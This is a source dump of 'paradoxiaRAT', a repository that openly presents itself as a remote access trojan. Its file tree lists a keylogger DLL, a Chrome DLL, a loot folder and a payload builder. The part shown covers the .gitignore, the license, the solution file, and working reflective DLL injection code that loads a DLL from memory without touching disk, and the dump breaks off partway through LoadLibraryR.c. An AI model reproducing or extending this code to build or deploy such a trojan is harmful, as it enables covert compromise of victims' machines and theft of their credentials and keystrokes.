├── .gitignore ├── GeoLite2-City.mmdb ├── LICENSE ├── ParadoxiaClient ├── ParadoxiaClient.sln └── ParadoxiaClient │ ├── GetProcAddressR.c │ ├── GetProcAddressR.h │ ├── LoadLibraryR.c │ ├── LoadLibraryR.h │ ├── ParadoxiaClient.c │ ├── ParadoxiaClient.vcxproj │ ├── ParadoxiaClient.vcxproj.filters │ ├── ReflectiveDLLInjection.h │ ├── icon.rc │ ├── main.c │ ├── makefile │ ├── paradoxia.c │ ├── paradoxia.h │ └── sys.c ├── README.md ├── blacklist ├── dlls ├── chrome.dll ├── keylogger.dll └── readme.md ├── images ├── logo.png ├── pd1.PNG ├── pd2.PNG ├── pd3.PNG ├── pd4.PNG ├── pd5.PNG ├── pd6.PNG ├── pd7.PNG ├── pd8.PNG └── pdmiss.PNG ├── install.sh ├── kernel ├── __init__.py ├── banner.py ├── builder.py ├── main.py ├── other.py └── scanner.py ├── loot └── README.md ├── paradoxia.ini ├── paradoxia.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Sometimes a file finds a way to slip through and make it through repo... 2 | 3 | .vscode/* 4 | .vs/* 5 | *.exe 6 | *.pyc 7 | *.d 8 | *.o 9 | *.dll 10 | output.png 11 | passwords.txt 12 | downloads/* 13 | *.bmp 14 | *.jpg 15 | *.jpeg 16 | *.wav 17 | test.c 18 | test.cpp 19 | ## Ignore Visual Studio temporary files, build results, and 20 | ## files generated by popular Visual Studio add-ons. 21 | ## 22 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 23 | 24 | # User-specific files 25 | *.rsuser 26 | *.suo 27 | *.user 28 | *.userosscache 29 | *.sln.docstates 30 | 31 | # User-specific files (MonoDevelop/Xamarin Studio) 32 | *.userprefs 33 | 34 | # Mono auto generated files 35 | mono_crash.* 36 | 37 | # Build results 38 | [Dd]ebug/ 39 | [Dd]ebugPublic/ 40 | [Rr]elease/ 41 | [Rr]eleases/ 42 | x64/ 43 | x86/ 44 | [Ww][Ii][Nn]32/ 45 | [Aa][Rr][Mm]/ 46 | [Aa][Rr][Mm]64/ 47 | bld/ 48 | [Bb]in/ 49 | [Oo]bj/ 50 | [Ll]og/ 51 | [Ll]ogs/ 52 | 53 | # Visual Studio 2015/2017 cache/options directory 54 | .vs/ 55 | # Uncomment if you have tasks that create the project's static files in wwwroot 56 | #wwwroot/ 57 | 58 | # Visual Studio 2017 auto generated files 59 | Generated\ Files/ 60 | 61 | # MSTest test Results 62 | [Tt]est[Rr]esult*/ 63 | [Bb]uild[Ll]og.* 64 | 65 | # NUnit 66 | *.VisualState.xml 67 | TestResult.xml 68 | nunit-*.xml 69 | 70 | # Build Results of an ATL Project 71 | [Dd]ebugPS/ 72 | [Rr]eleasePS/ 73 | dlldata.c 74 | 75 | # Benchmark Results 76 | BenchmarkDotNet.Artifacts/ 77 | 78 | # .NET Core 79 | project.lock.json 80 | project.fragment.lock.json 81 | artifacts/ 82 | 83 | # ASP.NET Scaffolding 84 | ScaffoldingReadMe.txt 85 | 86 | # StyleCop 87 | StyleCopReport.xml 88 | 89 | # Files built by Visual Studio 90 | *_i.c 91 | *_p.c 92 | *_h.h 93 | *.ilk 94 | *.meta 95 | *.obj 96 | *.iobj 97 | *.pch 98 | *.pdb 99 | *.ipdb 100 | *.pgc 101 | *.pgd 102 | *.rsp 103 | *.sbr 104 | *.tlb 105 | *.tli 106 | *.tlh 107 | *.tmp 108 | *.tmp_proj 109 | *_wpftmp.csproj 110 | *.log 111 | *.vspscc 112 | *.vssscc 113 | .builds 114 | *.pidb 115 | *.svclog 116 | *.scc 117 | 118 | # Chutzpah Test files 119 | _Chutzpah* 120 | 121 | # Visual C++ cache files 122 | ipch/ 123 | *.aps 124 | *.ncb 125 | *.opendb 126 | *.opensdf 127 | *.sdf 128 | *.cachefile 129 | *.VC.db 130 | *.VC.VC.opendb 131 | 132 | # Visual Studio profiler 133 | *.psess 134 | *.vsp 135 | *.vspx 136 | *.sap 137 | 138 | # Visual Studio Trace Files 139 | *.e2e 140 | 141 | # TFS 2012 Local Workspace 142 | $tf/ 143 | 144 | # Guidance Automation Toolkit 145 | *.gpState 146 | 147 | # ReSharper is a .NET coding add-in 148 | _ReSharper*/ 149 | *.[Rr]e[Ss]harper 150 | *.DotSettings.user 151 | 152 | # TeamCity is a build add-in 153 | _TeamCity* 154 | 155 | # DotCover is a Code Coverage Tool 156 | *.dotCover 157 | 158 | # AxoCover is a Code Coverage Tool 159 | .axoCover/* 160 | !.axoCover/settings.json 161 | 162 | # Coverlet is a free, cross platform Code Coverage Tool 163 | coverage*.json 164 | coverage*.xml 165 | coverage*.info 166 | 167 | # Visual Studio code coverage results 168 | *.coverage 169 | *.coveragexml 170 | 171 | # NCrunch 172 | _NCrunch_* 173 | .*crunch*.local.xml 174 | nCrunchTemp_* 175 | 176 | # MightyMoose 177 | *.mm.* 178 | AutoTest.Net/ 179 | 180 | # Web workbench (sass) 181 | .sass-cache/ 182 | 183 | # Installshield output folder 184 | [Ee]xpress/ 185 | 186 | # DocProject is a documentation generator add-in 187 | DocProject/buildhelp/ 188 | DocProject/Help/*.HxT 189 | DocProject/Help/*.HxC 190 | DocProject/Help/*.hhc 191 | DocProject/Help/*.hhk 192 | DocProject/Help/*.hhp 193 | DocProject/Help/Html2 194 | DocProject/Help/html 195 | 196 | # Click-Once directory 197 | publish/ 198 | 199 | # Publish Web Output 200 | *.[Pp]ublish.xml 201 | *.azurePubxml 202 | # Note: Comment the next line if you want to checkin your web deploy settings, 203 | # but database connection strings (with potential passwords) will be unencrypted 204 | *.pubxml 205 | *.publishproj 206 | 207 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 208 | # checkin your Azure Web App publish settings, but sensitive information contained 209 | # in these scripts will be unencrypted 210 | PublishScripts/ 211 | 212 | # NuGet Packages 213 | *.nupkg 214 | # NuGet Symbol Packages 215 | *.snupkg 216 | # The packages folder can be ignored because of Package Restore 217 | **/[Pp]ackages/* 218 | # except build/, which is used as an MSBuild target. 219 | !**/[Pp]ackages/build/ 220 | # Uncomment if necessary however generally it will be regenerated when needed 221 | #!**/[Pp]ackages/repositories.config 222 | # NuGet v3's project.json files produces more ignorable files 223 | *.nuget.props 224 | *.nuget.targets 225 | 226 | # Microsoft Azure Build Output 227 | csx/ 228 | *.build.csdef 229 | 230 | # Microsoft Azure Emulator 231 | ecf/ 232 | rcf/ 233 | 234 | # Windows Store app package directories and files 235 | AppPackages/ 236 | BundleArtifacts/ 237 | Package.StoreAssociation.xml 238 | _pkginfo.txt 239 | *.appx 240 | *.appxbundle 241 | *.appxupload 242 | 243 | # Visual Studio cache files 244 | # files ending in .cache can be ignored 245 | *.[Cc]ache 246 | # but keep track of directories ending in .cache 247 | !?*.[Cc]ache/ 248 | 249 | # Others 250 | ClientBin/ 251 | ~$* 252 | *~ 253 | *.dbmdl 254 | *.dbproj.schemaview 255 | *.jfm 256 | *.pfx 257 | *.publishsettings 258 | orleans.codegen.cs 259 | 260 | # Including strong name files can present a security risk 261 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 262 | #*.snk 263 | 264 | # Since there are multiple workflows, uncomment next line to ignore bower_components 265 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 266 | #bower_components/ 267 | 268 | # RIA/Silverlight projects 269 | Generated_Code/ 270 | 271 | # Backup & report files from converting an old project file 272 | # to a newer Visual Studio version. Backup files are not needed, 273 | # because we have git ;-) 274 | _UpgradeReport_Files/ 275 | Backup*/ 276 | UpgradeLog*.XML 277 | UpgradeLog*.htm 278 | ServiceFabricBackup/ 279 | *.rptproj.bak 280 | 281 | # SQL Server files 282 | *.mdf 283 | *.ldf 284 | *.ndf 285 | 286 | # Business Intelligence projects 287 | *.rdl.data 288 | *.bim.layout 289 | *.bim_*.settings 290 | *.rptproj.rsuser 291 | *- [Bb]ackup.rdl 292 | *- [Bb]ackup ([0-9]).rdl 293 | *- [Bb]ackup ([0-9][0-9]).rdl 294 | 295 | # Microsoft Fakes 296 | FakesAssemblies/ 297 | 298 | # GhostDoc plugin setting file 299 | *.GhostDoc.xml 300 | 301 | # Node.js Tools for Visual Studio 302 | .ntvs_analysis.dat 303 | node_modules/ 304 | 305 | # Visual Studio 6 build log 306 | *.plg 307 | 308 | # Visual Studio 6 workspace options file 309 | *.opt 310 | 311 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 312 | *.vbw 313 | 314 | # Visual Studio LightSwitch build output 315 | **/*.HTMLClient/GeneratedArtifacts 316 | **/*.DesktopClient/GeneratedArtifacts 317 | **/*.DesktopClient/ModelManifest.xml 318 | **/*.Server/GeneratedArtifacts 319 | **/*.Server/ModelManifest.xml 320 | _Pvt_Extensions 321 | 322 | # Paket dependency manager 323 | .paket/paket.exe 324 | paket-files/ 325 | 326 | # FAKE - F# Make 327 | .fake/ 328 | 329 | # CodeRush personal settings 330 | .cr/personal 331 | 332 | # Python Tools for Visual Studio (PTVS) 333 | __pycache__/ 334 | *.pyc 335 | 336 | # Cake - Uncomment if you are using it 337 | # tools/** 338 | # !tools/packages.config 339 | 340 | # Tabs Studio 341 | *.tss 342 | 343 | # Telerik's JustMock configuration file 344 | *.jmconfig 345 | 346 | # BizTalk build output 347 | *.btp.cs 348 | *.btm.cs 349 | *.odx.cs 350 | *.xsd.cs 351 | 352 | # OpenCover UI analysis results 353 | OpenCover/ 354 | 355 | # Azure Stream Analytics local run output 356 | ASALocalRun/ 357 | 358 | # MSBuild Binary and Structured Log 359 | *.binlog 360 | 361 | # NVidia Nsight GPU debugger configuration file 362 | *.nvuser 363 | 364 | # MFractors (Xamarin productivity tool) working folder 365 | .mfractor/ 366 | 367 | # Local History for Visual Studio 368 | .localhistory/ 369 | 370 | # BeatPulse healthcheck temp database 371 | healthchecksdb 372 | 373 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 374 | MigrationBackup/ 375 | 376 | # Ionide (cross platform F# VS Code tools) working folder 377 | .ionide/ 378 | 379 | # Fody - auto-generated XML schema 380 | FodyWeavers.xsd -------------------------------------------------------------------------------- /GeoLite2-City.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/GeoLite2-City.mmdb -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 QuantumCored 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30523.141 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ParadoxiaClient", "ParadoxiaClient\ParadoxiaClient.vcxproj", "{BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x64.ActiveCfg = Debug|x64 17 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x64.Build.0 = Debug|x64 18 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Debug|x86.Build.0 = Debug|Win32 20 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x64.ActiveCfg = Release|x64 21 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x64.Build.0 = Release|x64 22 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x86.ActiveCfg = Release|Win32 23 | {BC18AE1E-DDDD-4039-9EEC-91B2D35AF740}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {20FDEB1B-2065-4F66-9C09-ABB1D374A7B0} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/GetProcAddressR.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #include "GetProcAddressR.h" 29 | //===============================================================================================// 30 | // We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which 31 | // wont be able to resolve exported addresses in reflectivly loaded librarys. 32 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ) 33 | { 34 | UINT_PTR uiLibraryAddress = 0; 35 | FARPROC fpResult = NULL; 36 | 37 | if( hModule == NULL ) 38 | return NULL; 39 | 40 | // a module handle is really its base address 41 | uiLibraryAddress = (UINT_PTR)hModule; 42 | 43 | __try 44 | { 45 | UINT_PTR uiAddressArray = 0; 46 | UINT_PTR uiNameArray = 0; 47 | UINT_PTR uiNameOrdinals = 0; 48 | PIMAGE_NT_HEADERS pNtHeaders = NULL; 49 | PIMAGE_DATA_DIRECTORY pDataDirectory = NULL; 50 | PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL; 51 | 52 | // get the VA of the modules NT Header 53 | pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew); 54 | 55 | pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; 56 | 57 | // get the VA of the export directory 58 | pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress ); 59 | 60 | // get the VA for the array of addresses 61 | uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions ); 62 | 63 | // get the VA for the array of name pointers 64 | uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames ); 65 | 66 | // get the VA for the array of name ordinals 67 | uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals ); 68 | 69 | // test if we are importing by name or by ordinal... 70 | if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 ) 71 | { 72 | // import by ordinal... 73 | 74 | // use the import ordinal (- export ordinal base) as an index into the array of addresses 75 | uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) ); 76 | 77 | // resolve the address for this imported function 78 | fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) ); 79 | } 80 | else 81 | { 82 | // import by name... 83 | DWORD dwCounter = pExportDirectory->NumberOfNames; 84 | while( dwCounter-- ) 85 | { 86 | char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray )); 87 | 88 | // test if we have a match... 89 | if( strcmp( cpExportedFunctionName, lpProcName ) == 0 ) 90 | { 91 | // use the functions name ordinal as an index into the array of name pointers 92 | uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); 93 | 94 | // calculate the virtual address for the function 95 | fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray )); 96 | 97 | // finish... 98 | break; 99 | } 100 | 101 | // get the next exported function name 102 | uiNameArray += sizeof(DWORD); 103 | 104 | // get the next exported function name ordinal 105 | uiNameOrdinals += sizeof(WORD); 106 | } 107 | } 108 | } 109 | __except( EXCEPTION_EXECUTE_HANDLER ) 110 | { 111 | fpResult = NULL; 112 | } 113 | 114 | return fpResult; 115 | } 116 | //===============================================================================================// -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/GetProcAddressR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | #ifdef __MINGW32__ 33 | #define __try 34 | #define __except(x) if(0) 35 | #endif 36 | 37 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); 38 | //===============================================================================================// 39 | #endif 40 | //===============================================================================================// 41 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/LoadLibraryR.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #include "LoadLibraryR.h" 29 | #include 30 | //===============================================================================================// 31 | DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) 32 | { 33 | WORD wIndex = 0; 34 | PIMAGE_SECTION_HEADER pSectionHeader = NULL; 35 | PIMAGE_NT_HEADERS pNtHeaders = NULL; 36 | 37 | pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); 38 | 39 | pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); 40 | 41 | if( dwRva < pSectionHeader[0].PointerToRawData ) 42 | return dwRva; 43 | 44 | for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) 45 | { 46 | if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) 47 | return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); 48 | } 49 | 50 | return 0; 51 | } 52 | //===============================================================================================// 53 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) 54 | { 55 | UINT_PTR uiBaseAddress = 0; 56 | UINT_PTR uiExportDir = 0; 57 | UINT_PTR uiNameArray = 0; 58 | UINT_PTR uiAddressArray = 0; 59 | UINT_PTR uiNameOrdinals = 0; 60 | DWORD dwCounter = 0; 61 | #ifdef WIN_X64 62 | DWORD dwCompiledArch = 2; 63 | #else 64 | // This will catch Win32 and WinRT. 65 | DWORD dwCompiledArch = 1; 66 | #endif 67 | 68 | uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; 69 | 70 | // get the File Offset of the modules NT Header 71 | uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; 72 | 73 | // currenlty we can only process a PE file which is the same type as the one this fuction has 74 | // been compiled as, due to various offset in the PE structures being defined at compile time. 75 | if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 76 | { 77 | if( dwCompiledArch != 1 ) 78 | return 0; 79 | } 80 | else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 81 | { 82 | if( dwCompiledArch != 2 ) 83 | return 0; 84 | } 85 | else 86 | { 87 | return 0; 88 | } 89 | 90 | // uiNameArray = the address of the modules export directory entry 91 | uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; 92 | 93 | // get the File Offset of the export directory 94 | uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); 95 | 96 | // get the File Offset for the array of name pointers 97 | uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); 98 | 99 | // get the File Offset for the array of addresses 100 | uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); 101 | 102 | // get the File Offset for the array of name ordinals 103 | uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); 104 | 105 | // get a counter for the number of exported functions... 106 | dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; 107 | 108 | // loop through all the exported functions to find the ReflectiveLoader 109 | while( dwCounter-- ) 110 | { 111 | char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); 112 | 113 | if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) 114 | { 115 | // get the File Offset for the array of addresses 116 | uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); 117 | 118 | // use the functions name ordinal as an index into the array of name pointers 119 | uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); 120 | 121 | // return the File Offset to the ReflectiveLoader() functions code... 122 | return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); 123 | } 124 | // get the next exported function name 125 | uiNameArray += sizeof(DWORD); 126 | 127 | // get the next exported function name ordinal 128 | uiNameOrdinals += sizeof(WORD); 129 | } 130 | 131 | return 0; 132 | } 133 | //===============================================================================================// 134 | // Loads a DLL image from memory via its exported ReflectiveLoader function 135 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ) 136 | { 137 | HMODULE hResult = NULL; 138 | DWORD dwReflectiveLoaderOffset = 0; 139 | DWORD dwOldProtect1 = 0; 140 | DWORD dwOldProtect2 = 0; 141 | REFLECTIVELOADER pReflectiveLoader = NULL; 142 | DLLMAIN pDllMain = NULL; 143 | 144 | if( lpBuffer == NULL || dwLength == 0 ) 145 | return NULL; 146 | 147 | __try 148 | { 149 | // check if the library has a ReflectiveLoader... 150 | dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); 151 | if( dwReflectiveLoaderOffset != 0 ) 152 | { 153 | pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); 154 | 155 | // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... 156 | // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region 157 | if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) ) 158 | { 159 | // call the librarys ReflectiveLoader... 160 | pDllMain = (DLLMAIN)pReflectiveLoader(); 161 | if( pDllMain != NULL ) 162 | { 163 | // call the loaded librarys DllMain to get its HMODULE 164 | if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) ) 165 | hResult = NULL; 166 | } 167 | // revert to the previous protection flags... 168 | VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 ); 169 | } 170 | } 171 | } 172 | __except( EXCEPTION_EXECUTE_HANDLER ) 173 | { 174 | hResult = NULL; 175 | } 176 | 177 | return hResult; 178 | } 179 | //===============================================================================================// 180 | // Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function 181 | // Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 182 | // defined in order to use the correct RDI prototypes. 183 | // Note: The hProcess handle must have these access rights: 